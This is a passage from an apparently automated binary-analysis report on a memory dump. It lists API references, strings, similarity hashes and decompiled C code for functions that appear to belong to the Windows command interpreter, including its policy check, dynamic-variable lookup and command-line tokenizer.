0x003567cd
0x003567d1
0x003567a8
0x003567a8
0x00000000
0x003567a8
0x003567a6
0x003567a6
0x00000000
0x003567a6
0x00356762
0x00356767
0x0035676f
0x003567b1
0x003567b1
0x003567b1
0x003567b6
0x00000000
0x003567b6
0x00356771
0x00356771
0x00356784
0x00356788
0x0035678b
0x0035678f
0x00356795
0x00356799
0x00000000
0x00356799
0x00356af3
0x00356af5
0x00000000
0x00356af5
0x00356663
0x00356668
0x0035666a
0x003566b4
0x003566b4
0x003566ba
0x003566bd
0x003566c1
0x003566c2
0x003566c2
0x00000000
0x003566bd
0x0035666c
0x00356673
0x00356675
0x00356677
0x00356677
0x0035668c
0x00356692
0x00356694
0x00000000
0x00000000
0x00356696
0x0035669d
0x0035669f
0x003566a1
0x003566a1
0x003566a6
0x003566ad
0x003566af
0x003566b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00356640
0x00356642
0x00356643
0x00356643
0x00356afa
0x00356b01
0x00356b11
0x00356b12
0x00356b13
0x00356b1e
0x00356b1e

APIs

memset.MSVCRT ref: 00356613

Part of subcall function 00340C70: ??_V@YAXPAX@Z.MSVCRT ref: 00340CBA
Part of subcall function 00340C70: memset.MSVCRT ref: 00340CDD

SearchPathW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,?,00000000,?,?,00000000,?,-00000105), ref: 0035668C
??_V@YAXPAX@Z.MSVCRT ref: 00356B01

Part of subcall function 00340178: _get_osfhandle.MSVCRT ref: 00340183
Part of subcall function 00340178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0034D6A1), ref: 0034018D

_get_osfhandle.MSVCRT ref: 003566E9
GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 003566F1
_get_osfhandle.MSVCRT ref: 00356701
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00356709

Part of subcall function 0034269C: _get_osfhandle.MSVCRT ref: 003426A7
Part of subcall function 0034269C: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0033C5F8,?,?,?), ref: 003426B6
Part of subcall function 0034269C: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0033C5C6), ref: 003426D2
Part of subcall function 0034269C: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,00000002), ref: 003426E1
Part of subcall function 0034269C: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 003426EC
Part of subcall function 0034269C: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0033C5C6), ref: 003426F5

_get_osfhandle.MSVCRT ref: 00356739
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000105), ref: 00356741
memmove.MSVCRT ref: 0035678F
_get_osfhandle.MSVCRT ref: 00356812
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0035681A
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,?,?,?,00000400,00000000,00000000), ref: 00356882
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,00000000), ref: 0035692B
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00356932
_get_osfhandle.MSVCRT ref: 0035697E
WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00356986
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?), ref: 00356A1E
_get_osfhandle.MSVCRT ref: 00356A76
SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00356A7E
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00356AAD

Part of subcall function 00359953: _get_osfhandle.MSVCRT ref: 00359956
Part of subcall function 00359953: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0035995E

Strings

DPATH, xrefs: 0035665E

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: File_get_osfhandle$Type$ConsoleErrorHandleLastLockPointerReadSharedWritememset$AcquireByteCharModeMultiPathReleaseSearchSizeWidememmove
String ID: DPATH
API String ID: 1247154890-2010427443
Opcode ID: 6d63c89728d0613a1f0f52551667cf7825a9590031012be0cd5e38c668b01281
Instruction ID: 7156b100322e0443958e9f2ee6bac792ae5687fa9479f501dbf940b0c0029ff5
Opcode Fuzzy Hash: 6d63c89728d0613a1f0f52551667cf7825a9590031012be0cd5e38c668b01281
Instruction Fuzzy Hash: 45F1A371608341DFD726DF24C846F6BB7E8BB84715F404A2DF989972A0DB70D948CB52

Uniqueness

Uniqueness Score: -1.00%

Function 003444FC, Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 242
registrythreadmemoryCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E003444FC() {
				signed int _v8;
				char _v24;
				int* _v28;
				char _v29;
				char _v36;
				void* _v40;
				int* _v44;
				int _v48;
				int _v52;
				signed int _t26;
				void* _t39;
				intOrPtr _t44;
				intOrPtr _t48;
				intOrPtr _t51;
				int _t53;
				intOrPtr _t55;
				int _t59;
				int _t64;
				void* _t73;
				void* _t75;
				intOrPtr _t82;
				void* _t84;
				void* _t95;
				char* _t96;
				signed int _t97;
				signed int _t98;

				_t26 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t26 ^ _t98;
				_v44 = 0;
				 *0x36b938 = OpenThread(0x1fffff, 0, GetCurrentThreadId());
				E0034465D(_t75);
				__imp__HeapSetInformation(0, 1, 0, 0, _t95, _t97, _t73);
				_v36 = 0;
				if(RegOpenKeyExW(0x80000001, L"Software\\Policies\\Microsoft\\Windows\\System", 0, 0x20019,  &_v40) == 0) {
					_v48 = 4;
					RegQueryValueExW(_v40, L"DisableCMD", 0,  &_v52,  &_v36,  &_v48);
					RegCloseKey(_v40);
				}
				 *0x35d614 = 1;
				_t93 = 0x35d600;
				 *0x35d610 =  &_v29;
				_t39 = E00344719(0x35d600);
				asm("sbb al, al");
				 *0x35d614 =  *0x35d614 &  ~(_t39 - 1);
				E003446D8();
				_v28 = 0;
				_t96 =  &_v24;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t44 = E00343D27(0,  &_v24);
				if(_v36 == 1) {
					_push(0);
					_push(0x40002729);
					E0033C108( &_v24);
					E00353BB0(__eflags, 0);
					do {
						__eflags = E00344B60(__eflags, 0);
					} while (__eflags == 0);
					_push(0xff);
					goto L13;
				} else {
					_t96 = 0xff;
					if(_t44 == 0) {
						L29:
						_push(0);
						L003482C1();
						_v28 = _t44;
						_t84 = 0x36b8b8;
						_t97 = 2;
						__eflags = _t44;
						if(_t44 == 0) {
							L33:
							__eflags = _v36 - _t97;
							if(_v36 != _t97) {
								_t55 = E00340178(_t44);
								__eflags = _t55;
								if(_t55 == 0) {
									_t97 = 3;
									__imp___setmode(0x8000);
									0 = 0;
								}
								E0033B2B0(0, 0);
								while(1) {
									L40:
									 *0x35d590 = 0;
									EnterCriticalSection( *0x363858);
									 *0x35d544 = 0;
									LeaveCriticalSection( *0x363858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E0033EEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
									if(_t96 == 1) {
										continue;
									}
									L41:
									__eflags = _t96 - 0xffffffff;
									if(__eflags == 0) {
										do {
											__eflags = E00344B60(__eflags, 0);
										} while (__eflags == 0);
										L25:
										_push(0);
										L13:
										exit();
										L14:
										_t48 = E0033EEF0(1, _t93,  *0x373cd8);
										if(_t48 == 1) {
											do {
												__eflags = E00344B60(__eflags, 0);
											} while (__eflags == 0);
											_push(1);
											goto L13;
										}
										if(_t48 == 0xffffffff) {
											do {
												__eflags = E00344B60(__eflags, 0);
											} while (__eflags == 0);
											goto L25;
										}
										_t93 = _t48;
										_t51 = E00340E00(0, _t48);
										if(_t51 != 0) {
											_v28 = _t51;
										}
										L8:
										_t97 = _t97 + 1;
										if(_t97 < 3) {
											L7:
											_t93 =  *((intOrPtr*)(_t98 + _t97 * 4 - 0x14));
											if( *((intOrPtr*)(_t98 + _t97 * 4 - 0x14)) != 0) {
												goto L14;
											}
											goto L8;
										}
										E003406C0(0);
										_t53 = GetConsoleOutputCP();
										 *0x363854 = _t53;
										GetCPInfo(_t53, 0x363840);
										_t44 = E0034465D(0);
										_t82 =  *0x373ccc;
										L10:
										_t106 = _t82;
										if(_t82 == 0) {
											 *0x378058 = 0;
											goto L29;
										} else {
											goto L11;
										}
										do {
											L11:
										} while (E00344B60(_t106, 0) == 0);
										_push(_v28);
										goto L13;
									}
									EnterCriticalSection( *0x363858);
									 *0x35d544 = 0;
									LeaveCriticalSection( *0x363858);
									_t59 = GetConsoleOutputCP();
									 *0x363854 = _t59;
									GetCPInfo(_t59, 0x363840);
									E0034465D(_t86);
									E00340E00(0, _t96);
									 *0x35d59c = 0;
									E003406C0(0);
									_t64 = GetConsoleOutputCP();
									 *0x363854 = _t64;
									GetCPInfo(_t64, 0x363840);
									E0034465D(0);
									do {
										goto L40;
									} while (_t96 == 1);
									goto L41;
									L40:
									 *0x35d590 = 0;
									EnterCriticalSection( *0x363858);
									 *0x35d544 = 0;
									LeaveCriticalSection( *0x363858);
									_t93 = 0;
									_t86 = _t97;
									_t96 = E0033EEF0(_t97, 0, 0);
									__eflags = _t96 - 1;
								}
							}
							_push(0);
							_push(0x40002729);
							E0033C108(_t84);
							E00353BB0(__eflags, 0);
							do {
								__eflags = E00344B60(__eflags, 0);
							} while (__eflags == 0);
							_push(_t96);
							goto L13;
						}
						__eflags = _t44 - _t97;
						if(__eflags != 0) {
							goto L33;
						} else {
							goto L31;
						}
						do {
							L31:
							__eflags = E00344B60(__eflags, 0);
						} while (__eflags == 0);
						goto L25;
					}
					_push(0);
					_push(0x36b8b8);
					L003482C1();
					_t82 =  *0x373ccc;
					if(_t44 != 0) {
						_t44 = 1;
						_v44 = 1;
						__eflags = _t82;
						if(__eflags != 0) {
							_v28 = 0xff;
						}
					} else {
						_t44 = _v44;
					}
					if(_t44 != 0) {
						goto L10;
					} else {
						_t97 = 0;
						goto L7;
					}
				}
			}

0x00344504
0x0034450b
0x00344513
0x00344529
0x0034452e
0x00344538
0x00344541
0x0034455d
0x0034e6ee
0x0034e707
0x0034e710
0x0034e710
0x00344566
0x0034456d
0x00344572
0x00344577
0x0034457f
0x00344581
0x00344587
0x0034458e
0x00344591
0x00344594
0x00344598
0x00344599
0x0034459a
0x0034459b
0x003445a4
0x0034e71b
0x0034e71c
0x0034e721
0x0034e729
0x0034e72e
0x0034e734
0x0034e734
0x0034e738
0x00000000
0x003445aa
0x003445aa
0x003445b1
0x0034e77f
0x0034e77f
0x0034e785
0x0034e78a
0x0034e78e
0x0034e791
0x0034e792
0x0034e794
0x0034e7a6
0x0034e7a6
0x0034e7a9
0x0034e7d0
0x0034e7d5
0x0034e7d7
0x0034e7db
0x0034e7e2
0x0034e7e9
0x0034e7e9
0x0034e7eb
0x0034e7f0
0x0034e7f0
0x0034e7f6
0x0034e7fc
0x0034e808
0x0034e80e
0x0034e815
0x0034e817
0x0034e81e
0x0034e820
0x0034e823
0x00000000
0x00000000
0x0034e825
0x0034e825
0x0034e828
0x0034e899
0x0034e89f
0x0034e89f
0x0034e762
0x0034e762
0x00344625
0x00344625
0x0034462b
0x00344634
0x0034463c
0x0034e768
0x0034e76e
0x0034e76e
0x0034e772
0x00000000
0x0034e772
0x00344645
0x0034e758
0x0034e75e
0x0034e75e
0x00000000
0x0034e758
0x0034464b
0x0034464f
0x00344656
0x00344658
0x00344658
0x003445e3
0x003445e3
0x003445e7
0x003445db
0x003445db
0x003445e1
0x00000000
0x00000000
0x00000000
0x003445e1
0x003445e9
0x003445ee
0x003445fa
0x003445ff
0x00344605
0x0034460a
0x00344610
0x00344610
0x00344612
0x0034e779
0x00000000
0x00000000
0x00000000
0x00000000
0x00344618
0x00344618
0x0034461e
0x00344622
0x00000000
0x00344622
0x0034e830
0x0034e83c
0x0034e842
0x0034e848
0x0034e854
0x0034e859
0x0034e85f
0x0034e868
0x0034e86d
0x0034e873
0x0034e878
0x0034e884
0x0034e889
0x0034e88f
0x0034e7f0
0x00000000
0x00000000
0x00000000
0x0034e7f0
0x0034e7f6
0x0034e7fc
0x0034e808
0x0034e80e
0x0034e815
0x0034e817
0x0034e81e
0x0034e820
0x0034e820
0x0034e7f0
0x0034e7ab
0x0034e7ac
0x0034e7b1
0x0034e7b9
0x0034e7be
0x0034e7c4
0x0034e7c4
0x0034e7c8
0x00000000
0x0034e7c8
0x0034e796
0x0034e798
0x00000000
0x00000000
0x00000000
0x00000000
0x0034e79a
0x0034e79a
0x0034e7a0
0x0034e7a0
0x00000000
0x0034e7a4
0x003445b7
0x003445b8
0x003445bd
0x003445c4
0x003445cc
0x0034e744
0x0034e745
0x0034e748
0x0034e74a
0x0034e750
0x0034e750
0x003445d2
0x003445d2
0x003445d2
0x003445d7
0x00000000
0x003445d9
0x003445d9
0x00000000
0x003445d9
0x003445d7

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00344516
OpenThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(001FFFFF,00000000,00000000), ref: 00344523

Part of subcall function 0034465D: GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(KERNEL32.DLL,?,?,?,00344533), ref: 00344687
Part of subcall function 0034465D: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(FFFFFFFF,SetThreadUILanguage,?,?,?,00344533), ref: 003446A7

HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 00344538
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000001,Software\Policies\Microsoft\Windows\System,00000000,00020019,?), ref: 00344555
_setjmp3.MSVCRT ref: 003445BD
GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 003445EE
GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00363840), ref: 003445FF
exit.MSVCRT ref: 00344625
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,DisableCMD,00000000,?,?,?), ref: 0034E707
RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 0034E710

Part of subcall function 00344719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,00000000,?,00000000,?,?,?,?,?,?,0034D822,?,00000000,00000000), ref: 00344770
Part of subcall function 00344719: VirtualQuery.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,0000001C,?,?,?,?,?,?,0034D822,?,00000000,00000000), ref: 0034478C

Part of subcall function 003446D8: GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(0034458C), ref: 003446D8
Part of subcall function 003446D8: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00363840), ref: 003446E9
Part of subcall function 003446D8: memset.MSVCRT ref: 00344703

Part of subcall function 00343D27: InitializeCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(0036385C), ref: 00343D4B
Part of subcall function 00343D27: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00343D57
Part of subcall function 00343D27: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00343D6B
Part of subcall function 00343D27: SetConsoleCtrlHandler.API-MS-WIN-CORE-CONSOLE-L1-1-0(00356D90,00000001), ref: 00343D78
Part of subcall function 00343D27: _get_osfhandle.MSVCRT ref: 00343D85
Part of subcall function 00343D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00343D8D
Part of subcall function 00343D27: _get_osfhandle.MSVCRT ref: 00343D99
Part of subcall function 00343D27: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00343DA1
Part of subcall function 00343D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00343DC7
Part of subcall function 00343D27: GetCommandLineW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00343E02

_setjmp3.MSVCRT ref: 0034E785

Strings

DisableCMD, xrefs: 0034E6FF
Software\Policies\Microsoft\Windows\System, xrefs: 0034454B

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Console$CriticalQuerySection$CommandInfoLineModeOpenOutputThreadVirtual_get_osfhandle_setjmp3$AddressCloseCtrlCurrentEnterHandleHandlerHeapInformationInitializeLeaveModuleProcValueexitmemset
String ID: DisableCMD$Software\Policies\Microsoft\Windows\System
API String ID: 4268540630-1920437939
Opcode ID: 12ac31830f402390d625aa52c74cb69af0c26121257a7b5ea682359e1814ec1a
Instruction ID: 5d93a2fa4023c97cea5f6564f2bac0b026d9b30913b8096e169e4fe829154131
Opcode Fuzzy Hash: 12ac31830f402390d625aa52c74cb69af0c26121257a7b5ea682359e1814ec1a
Instruction Fuzzy Hash: 3971C571600309ABEF23AB709C85BAE7BECEB05325F15453AF505EE1A2DF74E9448721

Uniqueness

Uniqueness Score: -1.00%

Function 0033CFBC, Relevance: 33.4, APIs: 12, Strings: 7, Instructions: 141COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0035F830,00002000,?,?,?,?,?,0034373A,0033590A,00000000), ref: 0033CFDF
_wcsicmp.MSVCRT ref: 0033D005
_wcsicmp.MSVCRT ref: 0033D01B
_wcsicmp.MSVCRT ref: 0033D031
_wcsicmp.MSVCRT ref: 0033D047
_wcsicmp.MSVCRT ref: 0033D05D
_wcsicmp.MSVCRT ref: 0033D073
_wcsicmp.MSVCRT ref: 0033D085
_wcsicmp.MSVCRT ref: 0033D09B

Part of subcall function 003396A0: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0035F830,?,00002000), ref: 003396CC
Part of subcall function 003396A0: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 003396E0
Part of subcall function 003396A0: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 003396F4
Part of subcall function 003396A0: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00339708

Strings

CMDEXTVERSION, xrefs: 0033D02B
TIME, xrefs: 0033D06D
DATE, xrefs: 0033D057
CMDCMDLINE, xrefs: 0033D041
HIGHESTNUMANODENUMBER, xrefs: 0033D095
RANDOM, xrefs: 0033D07F
ERRORLEVEL, xrefs: 0033D015

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
API String ID: 2447294730-2301591722
Opcode ID: 8710dcf2cced6a310c429760715d741421119530bd239b43fe00ef7b715504cc
Instruction ID: 779993e4f1139eb9a60b46116ee1b9d3b86d3bbb5cbf0b13e4c47249e5e0e66d
Opcode Fuzzy Hash: 8710dcf2cced6a310c429760715d741421119530bd239b43fe00ef7b715504cc
Instruction Fuzzy Hash: 2731F436208602ABF72B2731BCCABAB67DDDB4A731F14412EF40AE11E1EF21D4018765

Uniqueness

Uniqueness Score: -1.00%

Function 0033F300, Relevance: 31.9, APIs: 15, Strings: 3, Instructions: 441
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0033F300(signed int __eax, signed short* __ecx, intOrPtr __edx, signed int _a4) {
				signed short* _v8;
				intOrPtr _v12;
				signed short* _v16;
				long _v20;
				signed int _t92;
				signed int _t102;
				signed int _t109;
				signed char _t110;
				int _t111;
				wchar_t* _t112;
				wchar_t* _t113;
				int _t114;
				signed int _t120;
				long _t121;
				int _t122;
				wchar_t* _t123;
				signed int _t129;
				int _t130;
				signed int _t135;
				int _t136;
				signed int _t139;
				signed short* _t141;
				int _t148;
				long _t152;
				int _t153;
				int _t155;
				wchar_t* _t156;
				wchar_t* _t157;
				int _t164;
				wchar_t* _t165;
				wchar_t* _t166;
				signed short* _t167;
				signed int _t169;
				signed int _t173;
				long* _t174;
				long* _t180;
				long* _t181;
				intOrPtr _t182;
				long* _t183;
				long _t184;
				long _t185;
				long _t186;
				long _t187;
				void* _t188;
				void* _t189;
				void* _t192;

				_t175 = __ecx;
				_t92 = __eax;
				_push(0);
				_push(0x36b8f8);
				_v12 = __edx;
				_v8 = __ecx;
				L003482C1();
				_t189 = _t188 + 8;
				if(__eax != 0) {
					L139:
					return _t92 | 0xffffffff;
				}
				_t180 = _v8;
				if(_t180 == 0) {
					if( *0x36f984 != 0) {
						_push( *0x36b8a0);
						E003425D9(L"Ungetting: \'%s\'\n");
					}
					 *0x36b8a4 =  *0x36b8a0;
					return 0;
				} else {
					if(_v12 < 6) {
						goto L139;
					}
					_t169 = _a4;
					 *0x36b8a0 =  *0x36b8a4;
					_v16 = _t180;
					if((_t169 & 0x00000021) == 0) {
						while(1) {
							_t187 = E0033F9D5(_t175) & 0x0000ffff;
							_t164 = iswspace(_t187);
							_t189 = _t189 + 4;
							if(_t164 != 0 && _t187 != 0xa) {
								goto L6;
							} else {
								continue;
							}
							do {
								_t187 = E0033F9D5(_t175) & 0x0000ffff;
								_t164 = iswspace(_t187);
								_t189 = _t189 + 4;
							} while (_t164 != 0 && _t187 != 0xa);
							L6:
							if((_t169 & 0x00000004) != 0) {
								_t165 = 0x332102;
							} else {
								_t165 = L"=,;";
							}
							_t166 = wcschr(_t165, _t187);
							_t189 = _t189 + 8;
							if(_t166 != 0) {
								if(_t187 == 0) {
									goto L9;
								} else {
									continue;
								}
							}
							L9:
							_t167 =  *0x36b8a4;
							if(_t167 != 0x363890) {
								 *0x36b8a4 = _t167 - 2;
							}
							goto L11;
						}
					}
					L11:
					_t184 = E0033F9D5(_t175) & 0x0000ffff;
					if( *0x35d5b4 != 0) {
						 *0x35d5b4 = 0;
						if((_t169 & 0x00000040) != 0) {
							goto L41;
						} else {
							_t184 = E0033F9D5(_t175) & 0x0000ffff;
							goto L12;
						}
						goto L140;
					} else {
						L12:
						_t129 = _t184 & 0x0000ffff;
						if(_t129 != 0xa) {
							if(_t129 >= 0x41) {
								if(_t129 >= 0x7c) {
									goto L25;
								} else {
									goto L33;
								}
							} else {
								L25:
								if(_t129 > 0x7c) {
									goto L33;
								} else {
									_t16 = _t129 + 0x33f8c0; // 0x5050500
									switch( *((intOrPtr*)(( *_t16 & 0x000000ff) * 4 +  &M0033F8A8))) {
										case 0:
											goto L13;
										case 1:
											goto L14;
										case 2:
											L27:
											if((_t169 & 0x0000002a) == 8) {
												goto L28;
											}
											goto L33;
										case 3:
											L28:
											if((_t169 & 0x00000022) == 0) {
												if((_t169 & 0x00000010) != 0 || _t184 != 0x29) {
													goto L13;
												} else {
												}
											}
											goto L33;
										case 4:
											if((__bl & 0x00000022) != 0) {
												goto L33;
											} else {
												if( *0x35d548 != 0) {
													goto L27;
												} else {
													goto L41;
												}
											}
											goto L140;
										case 5:
											goto L33;
									}
								}
							}
						} else {
							L13:
							_t169 = _t169 & 0xffffffdd;
							_a4 = _t169;
							L14:
							if((_t169 & 0x00000022) == 0) {
								L15:
								 *_t180 = _t184;
								_t183 =  &(_t180[0]);
								_v8 = _t183;
								_t174 = _t183;
								_t136 = iswdigit(_t184);
								_t192 = _t189 + 4;
								if(_t136 != 0) {
									_t184 = E0033F9D5(_t175) & 0x0000ffff;
									_t174 =  &(_t183[0]);
									 *_t183 = _t184;
									_t183 = _t174;
									_v8 = _t183;
								}
								if(_t184 == 0x3e || _t184 == 0x26 || _t184 == 0x7c || _t184 == 0x3c) {
									_t139 = E0033F9D5(_t175) & 0x0000ffff;
									if(_t139 ==  *(_t183 - 2)) {
										 *_t183 = _t139;
										_t183 =  &(_t174[0]);
										_v8 = _t183;
										_t139 = E0033F9D5(_t175) & 0x0000ffff;
										_t174 = _t183;
									}
									_t176 =  *(_t183 - 2) & 0x0000ffff;
									if(_t176 != 0x3e) {
										if(_t176 != 0x3c) {
											goto L79;
										}
										goto L78;
									} else {
										L78:
										if(_t139 == 0x26) {
											 *_t183 = 0x26;
											_t183 =  &(_t174[0]);
											_v8 = _t183;
											goto L109;
											do {
												do {
													L109:
													_t186 = E0033F9D5(_t176) & 0x0000ffff;
													_t148 = iswspace(_t186);
													_t192 = _t192 + 4;
												} while (_t148 != 0);
												_t176 = L"=,;";
											} while (E0033D7D4(L"=,;", _t186) != 0);
											if(iswdigit(_t186) != 0) {
												 *_t183 = _t186;
												_t183 =  &(_t183[0]);
												_v8 = _t183;
												E0033F9D5(_t176);
											}
										}
										L79:
										_t141 =  *0x36b8a4;
										if(_t141 != 0x363890) {
											 *0x36b8a4 = _t141 - 2;
										}
										goto L20;
									}
								} else {
									L20:
									 *_t183 = 0;
									return  *_v16 & 0x0000ffff;
								}
							}
							L33:
							if(_t184 == 0x5e) {
								if((_t169 & 0x00000022) != 0) {
									goto L34;
								} else {
									_t184 = E0033F9D5(_t175) & 0x0000ffff;
									if(_t184 == 0) {
										goto L15;
									}
									if(_t184 != 0xa) {
										goto L41;
									} else {
										_t184 = E0033F9D5(_t175) & 0x0000ffff;
										if(_t184 != 0) {
											goto L41;
										} else {
											goto L15;
										}
									}
								}
								goto L140;
							} else {
								L34:
								if(_t184 == 0x22) {
									_t169 = _t169 ^ 0x00000002;
									_a4 = _t169;
								}
								if((_t169 & 0x00000023) == 0) {
									_t155 = iswspace(_t184);
									_t189 = _t189 + 4;
									if(_t155 != 0) {
										goto L15;
									}
									if((_t169 & 0x00000004) != 0) {
										_t156 = 0x332102;
									} else {
										_t156 = L"=,;";
									}
									_t157 = wcschr(_t156, _t184);
									_t189 = _t189 + 8;
									if(_t157 != 0) {
										goto L15;
									}
								}
								_t130 = iswdigit(_t184);
								_t189 = _t189 + 4;
								if(_t130 != 0) {
									_t175 =  *0x36b8a4;
									if((_t175 - 0x36388e & 0xfffffffe) < 4) {
										L88:
										_t135 =  *_t175 & 0x0000ffff;
										if(_t135 != 0x3e) {
											if(_t135 != 0x3c) {
												goto L41;
											} else {
												goto L89;
											}
										} else {
											L89:
											if((_t169 & 0x00000022) == 0) {
												goto L15;
											}
											goto L41;
										}
									} else {
										_t152 =  *(_t175 - 4) & 0x0000ffff;
										_v20 = _t152;
										_t153 = iswspace(_t152);
										_t189 = _t189 + 4;
										if(_t153 == 0) {
											_t175 = L"()|&=,;\"";
											if(E0033D7D4(L"()|&=,;\"", _v20) == 0) {
												goto L41;
											} else {
												goto L87;
											}
										} else {
											L87:
											_t175 =  *0x36b8a4;
											goto L88;
										}
									}
									goto L140;
								}
							}
						}
					}
					L41:
					 *_t180 = _t184;
					_t181 =  &(_t180[0]);
					_a4 = _t169 | 0x00000040;
					 *0x35d548 = 0;
					_t173 = _t181 - _v16 >> 1;
					while(1) {
						_v8 = _t181;
						_t185 = E0033F9D5(_t175) & 0x0000ffff;
						if( *0x35d5b4 != 0) {
							goto L131;
						}
						L43:
						_t109 = _t185 & 0x0000ffff;
						if(_t109 < 0x41 || _t109 >= 0x7c) {
							if(_t109 > 0x7c) {
								goto L45;
							} else {
								_t34 = _t109 + 0x33f958; // 0x5050500
								switch( *((intOrPtr*)(( *_t34 & 0x000000ff) * 4 +  &M0033F940))) {
									case 0:
										_t127 = _a4;
										goto L54;
									case 1:
										__eax = _a4;
										goto L55;
									case 2:
										__eax = _a4;
										goto L114;
									case 3:
										L101:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if((__al & 0x00000010) != 0) {
												L54:
												_t102 = _t127 & 0xffffffdd;
												_a4 = _t102;
												L55:
												if((_t102 & 0x00000022) != 0) {
													goto L45;
												}
												goto L62;
											} else {
												if(__si == 0x29) {
													goto L45;
												} else {
													goto L54;
												}
											}
										}
										goto L140;
									case 4:
										__eax = _a4;
										if((__al & 0x00000022) != 0) {
											goto L45;
										} else {
											if( *0x35d548 == 0) {
												goto L49;
											} else {
												L114:
												__al = __al & 0x0000002a;
												if(__al != 8) {
													goto L45;
												} else {
													goto L101;
												}
											}
										}
										goto L140;
									case 5:
										goto L45;
								}
							}
						} else {
							L45:
							_t110 = _a4;
							if(_t185 == 0x5e) {
								if((_t110 & 0x00000022) != 0) {
									goto L46;
								} else {
									_t185 = E0033F9D5(_t175) & 0x0000ffff;
									if(_t185 == 0) {
										goto L61;
									} else {
										if(_t185 != 0xa) {
											goto L49;
										} else {
											_t185 = E0033F9D5(_t175) & 0x0000ffff;
											if(_t185 == 0) {
												goto L61;
											} else {
												goto L49;
											}
										}
									}
								}
								goto L140;
							} else {
								L46:
								if(_t185 == 0x22) {
